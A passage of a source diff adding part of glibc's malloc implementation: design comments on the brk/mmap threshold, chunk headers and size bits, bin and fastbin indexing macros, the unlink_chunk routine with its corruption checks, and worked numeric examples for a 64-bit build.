+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements.
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb that was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system; when handing out mmapped pages the kernel
+  simply has no choice but to zero them.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86; at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upper bound on the threshold satisfies requirement 2).
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
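+
+/* Illustrative numbers (example only), assuming a typical 64-bit build
+   where SIZE_SZ == 8: the user pointer sits 2*SIZE_SZ == 16 bytes past
+   the chunk base, so
+
+     mem2chunk (mem)  ==  (mchunkptr) ((char *) mem - 16)
+     chunk2mem (p)    ==  (void *) ((char *) p + 16)
+
+   and a size field reading 0x91 describes a 0x90-byte chunk whose
+   PREV_INUSE bit is set.  */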
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Check whether REQ overflows when padded and aligned, and whether the
+   resulting value is at most PTRDIFF_MAX.  On success, returns true and
+   stores the padded size (or MINSIZE, if the padded value would be
+   smaller) in *SZ; returns false if any of these checks fail.  */
+static inline bool
+checked_request2size (size_t req, size_t *sz) __nonnull (1)
+{
+  if (__glibc_unlikely (req > PTRDIFF_MAX))
+    return false;
+  *sz = request2size (req);
+  return true;
+}
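+
+/* Worked example (illustration only), assuming a typical 64-bit build
+   where SIZE_SZ == 8, MALLOC_ALIGNMENT == 16 and hence MINSIZE == 32:
+
+     request2size (0)   == 32   (below MINSIZE, so MINSIZE is used)
+     request2size (24)  == 32   ((24 + 8 + 15) & ~15)
+     request2size (25)  == 48   (needs another 16-byte granule)
+
+   checked_request2size additionally rejects requests above PTRDIFF_MAX
+   before doing this padding.  */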
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
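+
+/* Illustrative use of the head/foot macros (example only): for a free
+   0x90-byte chunk p whose previous neighbour is in use,
+
+     set_head (p, 0x90 | PREV_INUSE);
+     set_foot (p, 0x90);
+
+   the second call stores 0x90 into the prev_size field of the chunk at
+   p + 0x90, which is how the "foot" described above is really the next
+   chunk's prev_size.  */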
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
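+
+/* Worked example (illustration only), assuming a typical 64-bit build
+   where SIZE_SZ == 8 and MALLOC_ALIGNMENT == 16, so SMALLBIN_WIDTH is
+   16, SMALLBIN_CORRECTION is 0 and MIN_LARGE_SIZE is 1024:
+
+     bin_index (0x90)  == smallbin_index (0x90)  == 0x90 >> 4  == 9
+     bin_index (0x400) == largebin_index_64 (0x400)
+                       == 48 + (0x400 >> 6)      == 64
+
+   i.e. 0x90-byte chunks live in small bin 9, and 1024 bytes is the
+   first large-bin size.  */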
+
+/* Take a chunk off a bin list.  */
+static void
+unlink_chunk (mstate av, mchunkptr p)
+{
+  if (chunksize (p) != prev_size (next_chunk (p)))
+    malloc_printerr ("corrupted size vs. prev_size");
+
+  mchunkptr fd = p->fd;
+  mchunkptr bk = p->bk;
+
+  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
+    malloc_printerr ("corrupted double-linked list");
+
+  fd->bk = bk;
+  bk->fd = fd;
+  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
+    {
+      if (p->fd_nextsize->bk_nextsize != p
+	  || p->bk_nextsize->fd_nextsize != p)
+	malloc_printerr ("corrupted double-linked list (not small)");
+
+      if (fd->fd_nextsize == NULL)
+	{
+	  if (p->fd_nextsize == p)
+	    fd->fd_nextsize = fd->bk_nextsize = fd;
+	  else
+	    {
+	      fd->fd_nextsize = p->fd_nextsize;
+	      fd->bk_nextsize = p->bk_nextsize;
+	      p->fd_nextsize->bk_nextsize = fd;
+	      p->bk_nextsize->fd_nextsize = fd;
+	    }
+	}
+      else
+	{
+	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
+	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
+	}
+    }
+}
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
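+
+/* Worked example (illustration only): for bin 70,
+   idx2block (70) == 70 >> 5 == 2 and idx2bit (70) == 1 << (70 & 31)
+   == 1 << 6, so mark_bin (m, 70) sets bit 6 of binmap[2].  */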
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
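+
+/* Worked example (illustration only), assuming a typical 64-bit build
+   where SIZE_SZ == 8: fastbin_index (0x20) == (0x20 >> 4) - 2 == 0 and
+   fastbin_index (0x80) == 6, so 0x20-byte chunks go in the first
+   fastbin.  MAX_FAST_SIZE is 160, request2size (160) is 176, and
+   NFASTBINS is therefore (176 >> 4) - 2 + 1 == 10.  */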
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? MIN_CHUNK_SIZE / 2 : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
